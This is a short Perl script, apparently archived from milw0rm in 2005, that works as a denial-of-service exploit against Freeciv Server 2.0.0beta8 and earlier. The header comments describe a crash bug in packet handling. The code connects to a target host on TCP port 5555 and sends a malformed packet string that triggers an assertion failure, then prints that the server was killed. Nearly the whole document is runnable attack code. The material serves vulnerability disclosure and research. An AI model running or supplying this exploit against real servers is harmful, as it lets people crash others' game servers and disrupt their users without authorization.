#!/usr/bin/perl

# Freeciv Server <= 2.0.0beta8 DoS exploit (windows&linux releases)
# Vendor: http://www.freeciv.org/
# Advisory: Nico Spicher [ http://triplex.it-helpnet.de/ ]

# There is a vulnerability in the handling of incoming data. If the request
# is uncomplete or modified, the server crashes because of a bug in the
# get_packet_from_connection function in packets.c. Look at the code below
# for more information.

use IO::Socket;

if (@ARGV < 1)
 {
system "clear";
print "[-] Usage: exploit_freeciv.pl <host ip>\n";
exit(1);
 }
system "clear";

$server = $ARGV[0];
print "[-] Freeciv DoS Exploit\n\n";
print "[-] Server IP: ";
print $server;
print "\n[-] Connecting to IP ...\n";

$socket = IO::Socket::INET->new(
	Proto => "tcp",
	PeerAddr => "$server",
	PeerPort => "5555"); unless ($socket) { die "[-] $server is offline\n" }

print "[-] Connected\n\n";

print "[-] Creating string\n";

$string="@+2.0 conn_ping_info username_info-beta8";
# >civserver: packets.c:385: get_packet_from_connection:
# 	      Assertion 'error == 0' failed.
# Aborted(core dumped)

print "[-] Sending string\n\n";

print $socket "$string";

print "[>] Attack successful - Server killed\n";

close($socket);

# milw0rm.com [2005-03-14]
